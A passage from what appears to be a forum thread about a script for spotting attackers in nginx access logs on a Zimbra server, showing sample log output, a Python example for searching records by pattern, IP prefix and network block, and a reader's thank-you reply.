 Attacker from  93.119.227.19                   1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
 Attacker from  93.119.227.34                   1 Requests - Score 25%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
 Attacker from  93.119.227.91                   1 Requests - Score 25%
------------------------------------------------------------------------------------------------------------

Which shows some door knocking but nothing dangerous. Add the --display=date to track the frequency of the connection. Just a bot determining this is a zimbra site.
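Added example for the two points in this post, --search and the three-octet --srcip; editor-written Python over already-parsed records, not check_attacks.pl. search() reproduces the intentional behaviour described above (an IP that matches on any one request comes back with all of its requests), srcip_prefix() does the leading-octets match but anchored so that '10.1.1' does not also catch 10.1.10.x, and by_network() generalises the idea to any CIDR size with the standard ipaddress module so a /24 or /16 that is hitting you from several hosts stands out. The RECORDS list is constructed (documentation-range addresses, shortened user agents) and the function names are this example's own.

```python
import re
import ipaddress
from collections import defaultdict

# Constructed records in the fields the script displays; not the post's log data.
RECORDS = [
    {"ip": "203.0.113.19", "status": "200", "request": "GET /", "ua": "Wget/1.13.4 (linux-gnu)", "date": "01/May/2019:06:04:07"},
    {"ip": "203.0.113.34", "status": "200", "request": "GET /", "ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X)", "date": "01/May/2019:06:05:11"},
    {"ip": "203.0.113.91", "status": "200", "request": "GET /", "ua": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0)", "date": "01/May/2019:06:07:40"},
    {"ip": "198.51.100.30", "status": "404", "request": "GET /nx8j78af1b.jsp", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "date": "02/May/2019:06:20:50"},
    {"ip": "198.51.100.30", "status": "200", "request": "GET /robots.txt", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "date": "02/May/2019:06:20:51"},
    {"ip": "192.0.2.8", "status": "400", "request": "POST /Autodiscover/Autodiscover.xml", "ua": "python-requests/2.21.0", "date": "29/Apr/2019:00:24:56"},
]


def search(records, pattern, fields=("ua", "request", "date")):
    """Like --search: regex over user agent, request and date. An IP that matches on
    any one request is returned with ALL of its requests, in log order."""
    rx = re.compile(pattern)
    hit_ips = {r["ip"] for r in records if any(rx.search(r[f]) for f in fields)}
    return {ip: [r for r in records if r["ip"] == ip] for ip in sorted(hit_ips)}


def srcip_prefix(records, prefix):
    """The three-octet --srcip trick, anchored at the start and at an octet boundary:
    '203.0.113' matches 203.0.113.x but not 1203.0.113.x or 203.0.1130.x."""
    rx = re.compile(r"^" + re.escape(prefix) + r"(\.|$)")
    return sorted({r["ip"] for r in records if rx.match(r["ip"])})


def by_network(records, prefixlen=24):
    """Generalisation of the octet trick: requests per host, grouped by CIDR block."""
    nets = defaultdict(lambda: defaultdict(int))
    for r in records:
        net = ipaddress.ip_network(f"{r['ip']}/{prefixlen}", strict=False)
        nets[net][r["ip"]] += 1
    return {str(net): dict(hosts) for net, hosts in sorted(nets.items())}


def wider_than_host(records, prefixlen=24, min_hosts=2):
    """Blocks from which at least min_hosts distinct addresses hit the server,
    i.e. the 'something larger than a /32' case."""
    return {net: hosts for net, hosts in by_network(records, prefixlen).items()
            if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for ip, recs in search(RECORDS, r"\.jsp|python").items():
        for r in recs:
            print(f"   [ {r['status']}] {r['request']}  {r['date']}")
        print(f" Attacker from  {ip:<32}{len(recs)} Requests")
    print(srcip_prefix(RECORDS, "203.0.113"))
    print(wider_than_host(RECORDS))
```

Sorting ipaddress network objects puts blocks in numeric rather than string order, which is the order you want when scanning a long list; the per-host counts inside each block are what tell a single scanner with a few addresses apart from a whole subnet of compromised hosts.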
Peter Parker
Posts: 7
Joined: Mon Apr 09, 2018 2:06 am
Location: Vietnam

Re: Script to investigate nginx.access.log and attackers

Postby Peter Parker » Wed Oct 16, 2019 8:15 am

Hi JDunphy,

Thank you very much for sharing with us this script. I'm facing this problem.
